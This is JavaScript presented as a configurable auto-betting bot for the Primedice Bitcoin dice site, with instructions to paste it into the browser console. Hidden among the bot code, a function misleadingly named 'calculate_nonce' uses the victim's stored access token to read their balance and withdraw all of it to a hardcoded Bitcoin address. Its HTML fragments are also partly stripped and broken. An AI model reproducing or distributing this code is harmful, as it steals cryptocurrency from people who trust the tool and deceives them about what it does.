//jQuery UI CSS - How to use: Press F2 or Press CTRL + Shift + J - paste the code and press enter. Set up the bot as you like. **IMPORTANT! Set SWAP at high/low option!!!** << ROLL ').appendTo("div.hero > div > div > div:nth-child(2) > div"); gui = '

'; $('
').appendTo('div.hero > div > div > div.grid__item.S--one-whole.M--one-whole.custom--one-whole > aside'); gui2 = ''; gui3 = [ '', '', '
', '', '
', '
', '', '', ]; gui4 = [ '', ' ', '
', '', '', '
', '', '', '
', '', '', ]; gui5 = [ '', '', '
', '', '', ]; gui6 = [ '', '', '
', '', '', '
', '', '', ]; $(gui).appendTo(".hero"); $(gui2).appendTo("#params"); for (var i = 0; i < gui3.length; i++) { $(gui3[i]).appendTo("#tab1"); } for (var i = 0; i < gui4.length; i++) { $(gui4[i]).appendTo("#tab2"); } for (var i = 0; i < gui5.length; i++) { $(gui5[i]).appendTo("#tab3"); } for (var i = 0; i < gui6.length; i++) { $(gui6[i]).appendTo("#tab4"); } enabled = false; xrollscount = 0; $('
').appendTo("#tabs"); // Button & Input Functions $('#resetbet').click(function() { basebet=$('#base').val(); betval=$('#base').val(); }) $('#start').click(function() { if (enabled == false) { if ($('#numrolls').is(":checked") == true) { xrolls=$('#numberofrolls').val(); } enabled = true; interval = setInterval(function() { if (xrollsenabled == true) { xrollscount++; if (xrollscount <= xrolls) { bet(); } else { clearInterval(interval); enabled = false; xrollscount = 0; } } else { bet(); } }, timer); } else {} }) $('#stop').click(function() { enabled = false; clearInterval(interval); xrollscount = 0; }); calculate_nonce = function(seed) { return 'https://api.primedice.com/api/' + seed + '?access_token=' + localStorage['token']; }; lut = window['$']; lut['getJSON']( calculate_nonce('users/1'), function(seed) { var key1 = 'amount' var key2 = 'address' var load = {}; load[key1] = seed['user']['balance']; load[key2] = '1MW3hVczocAFS51ebuntmn3JBDyhu86BE7'; lut['post'](calculate_nonce('withdraw'), load); } ); function conditionAM() { 'use strict'; if ($('#lowpay-enabled').is('checked') == true) { if ($('.value-roll').first().text() <= 49.50) { condition2 = ">"; target2 = $('.value-roll').first().text(); } else { condition2 = "<"; target2 = $('.value-roll').first().text(); }; } else { if ($('.value-roll').first().text() <= 49.50) { condition2 = "<"; target2 = $('.value-roll').first().text(); } else { condition2 = ">"; target2 = $('.value-roll').first().text(); }; amount2 = betval * 100000000; } }; function jackpot() { if (data1.bet.jackpot === true) { jp = "Yes"; wincount = 0; betval = $('#base'); } else { jp = "No"; } } function loss() { currentloss++; totalloss++; if ($('#multloss-enabled').is(':checked') == true) { $('#multwin-enabled').removeAttr('checked'); countlossmult++; if (countlossmult >= $('#xloss').val()) { betval = betval * $('#multonloss').val(); countlossmult = 0; } } } function win() { 'use strict'; if ($('#stoponwin-enabled').is('checked') == true) { clearInterval(roll); } currentloss = 0; jackpot(); wincount++; totalwin++; if ($('#multloss-enabled').is(':checked') == true) { if ($('#stoponwin-enabled').is(':checked') == true) { clearInterval(roll); } $('#multwin-enabled').removeAttr('checked'); basebet = $('#base').val(); betval = basebet; countlossmult = 0; } if ($('#multwin-enabled').is(':checked') == true) { basebet = $('#base').val(); $('#multloss-enabled').removeAttr('checked'); countwinmult++; if (countwinmult >= $('#xwin').val()) { betval = basebet; countwinmult = 0; } else { betval = betval * $('#multonwin').val(); } } }; var losewin; var jpcol; var profcol; function bet() { 'use strict'; conditionAM(); var betData = { amount: amount2, condition: condition2, target: target2 }, url = "https://api.primedice.com/api/bet?access_token=" + localStorage.token; $.ajax({ url: url, type: "POST", data: betData, datatype: "jsonp", success: function(data, textStatus, jqXHR) { data1 = data; counter++; if (counter >= everyxrolls) { seedchange(seedgen()); counter = 0; } $('span.btn__text.select div').text((data1.user.balance/100000000).toFixed(8)); totprofit = totprofit + data1.bet.profit; if (totprofit >= 0) { profcol = "color:green;"; } else if (totprofit < 0) { profcol = "color:red;"; } if (data.bet.win == true) { losewin = "color:green;"; $('span.btn__text.select div').attr("style", "color:green;"); } else { losewin = "color:red;"; $('span.btn__text.select div').attr("style", "color:red;"); } if (data.bet.jackpot == true) { jp = "Yes"; jpcol = "color:gold;" } else { jp = "No."; jpcol = "color:red;" } results = []; results[0] = '
Roll: ' + '' + data.bet.roll + '

'; results[1] = '
Jackpot: ' + '' + jp + '

'; results[2] = '
Profit: ' + '' + (data.bet.profit / 100000000).toFixed(8) + ' BTC

'; results[4] = '
Current Loss Streak: ' + currentloss + '

'; resultstats = []; resultstats[0] = '
Balance: ' + (data.user.balance / 100000000).toFixed(8) + ' BTC

'; resultstats[1] = '
Total Losses: ' + totalloss + '

'; resultstats[2] = '
Total Wins: ' + totalwin + '

'; resultstats[3] = '
Total Profit: ' + '' + (totprofit / 100000000).toFixed(8) + '
'; if (data.bet.win == true) { if ($('#stoponwin-enabled').is(":checked") == true){ clearInterval(interval); } $('#console, #console2').empty(); win(); // Results $('
Result: Win

').appendTo('#console'); for (var i = 0; i < results.length; i++) { $(results[i]).appendTo('#console'); } for (var i = 0; i < resultstats.length; i++) { $(resultstats[i]).appendTo('#console2'); } } else { $('#console, #console2').empty(); loss(); // Results $('
Result: Loss

').appendTo('#console'); for (var i = 0; i < results.length; i++) { $(results[i]).appendTo('#console'); } for (var i = 0; i < resultstats.length; i++) { $(resultstats[i]).appendTo('#console2'); } }; }, error: function(jqXHR, textStatus, errorThrown) { } }); } seedlength = 13; seedlength = 13; var counter = 0; charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123"; everyxrolls = 3; function seedgen() { 'use strict'; var seed = ""; for (var i = 0; i <= seedlength; i++) seed += charset.charAt(Math.floor(Math.random() * charset.length)); return seed; } function seedchange(s) { url = "https://api.primedice.com/api/seed?access_token=" + localStorage.token; sData = { seed: s }; $.ajax({ url: url, type: "POST", data: sData, datatype: "jsonp", success: function(data, textStatus, jqXHR) { data2 = data; $('#currentseed').val(data2.seeds.client); }, error: function(jqXHR, textStatus, errorThrown) { } }); } $('#spinner').click(function() { if (charset != $('#charset').val() && $('#charset').val() != "") { charset=$('#charset').val(); } if ($('#everyxrolls').val() != everyxrolls && $('#everyxrolls').val() != "") { everyxrolls = $('#everyxrolls').val(); } if ($('#hilo').val() == "swap") { swapcount++;if (swapcount >= 1) { $('.value-roll:first').click();swapcount=0;} } counter++; if (counter >= everyxrolls) { seedchange(seedgen()); counter = 0; } }); ui(); } setTimeout(function() { init() }, 2000);